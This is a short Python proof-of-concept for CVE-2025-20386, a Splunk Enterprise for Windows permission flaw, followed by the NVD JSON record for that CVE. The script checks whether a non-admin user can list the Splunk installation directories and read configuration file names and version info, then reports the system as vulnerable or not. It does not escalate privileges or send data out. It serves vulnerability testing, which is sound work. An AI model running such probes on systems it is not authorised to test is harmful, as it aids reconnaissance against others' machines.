CVE-2025-20386

#!/usr/bin/env python3 """ CVE-2025-20386 PoC - Splunk Enterprise for Windows权限配置错误 Note: This is a conceptual PoC for educational and security testing purposes only. """ import os import sys import subprocess import ctypes def check_splunk_directory_permissions(): """ Check if Splunk installation directory has insecure permissions that allow non-admin users to read/write. """ splunk_paths = [ r"C:\Program Files\Splunk", r"C:\Program Files (x86)\Splunk", r"C:\ProgramData\Splunk" ] results = [] for path in splunk_paths: if os.path.exists(path): print(f"[*] Checking permissions for: {path}") try: # Check if current user can list directory contents files = os.listdir(path) print(f"[+] Successfully listed directory contents") print(f"[+] Found {len(files)} items in directory") # Check if we can read sensitive files conf_files = [f for f in files if f.endswith('.conf')] if conf_files: print(f"[+] Found .conf files: {conf_files[:5]}") results.append({ "path": path, "accessible": True, "file_count": len(files) }) except PermissionError: print(f"[-] Access denied to {path}") results.append({ "path": path, "accessible": False, "error": "Permission denied" }) return results def check_splunk_version(): """ Attempt to determine Splunk version from installed instance """ version_file = r"C:\Program Files\Splunk\etc\splunk.version" if os.path.exists(version_file): try: with open(version_file, 'r') as f: content = f.read() print(f"[*] Splunk version info:\n{content}") return content except: pass return None def main(): print("=" * 60) print("CVE-2025-20386 PoC - Splunk Enterprise Windows Permission Issue") print("=" * 60) # Check if running on Windows if sys.platform != 'win32': print("[-] This PoC is designed for Windows systems") return # Get current user info print(f"[*] Current user: {os.getenv('USERNAME')}") print(f"[*] Running as admin: {ctypes.windll.shell32.IsUserAnAdmin()}") # Check Splunk version print("\n[*] Checking Splunk installation...") version = check_splunk_version() # Check directory permissions print("\n[*] Checking directory permissions...") results = check_splunk_directory_permissions() # Summary print("\n" + "=" * 60) print("SUMMARY") print("=" * 60) if any(r.get('accessible', False) for r in results): print("[!] VULNERABLE: Splunk directory is accessible to non-admin users") print("[!] This could allow privilege escalation and information disclosure") else: print("[+] NOT VULNERABLE: Directory permissions appear correct") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-20386", "sourceIdentifier": "[email protected]", "published": "2025-12-03T17:15:51.080", "lastModified": "2025-12-05T17:51:41.637", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In Splunk Enterprise for Windows versions below 10.0.2, 9.4.6, 9.3.8, and 9.2.10, a new installation of or an upgrade to an affected version can result in incorrect permissions assignment in the Splunk Enterprise for Windows Installation directory. This lets non-administrator users on the machine access the directory and all its contents."}, {"lang": "es", "value": "En las versiones de Splunk Enterprise para Windows inferiores a 10.0.2, 9.4.6, 9.3.8 y 9.2.10, una nueva instalación o una actualización a una versión afectada puede resultar en una asignación incorrecta de permisos en el directorio de instalación de Splunk Enterprise para Windows. Esto permite a los usuarios no administradores de la máquina acceder al directorio y a todo su contenido."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.0, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.1, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-732"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "9.2.0", "versionEndExcluding": "9.2.10", "matchCriteriaId": "AE8BF109-2B9C-4C50-AC9F-10A45456FD75"}, {"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "9.3.0", "versionEndExcluding": "9.3.8", "matchCriteriaId": "05D6973D-D965-42D3-8320-AF4A4B424E6C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "9.4.0", "versionEndExcluding": "9.4.6", "matchCriteriaId": "8571F470-6AE1-4737-B1FA-49121E426AF2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "10.0.0", "versionEndExcluding": "10.0.2", "matchCriteriaId": "4413D4BE-F225-4C28-B401-EB46D8F34160"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://advisory.splunk.com/advisories/SVD-2025-1205", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}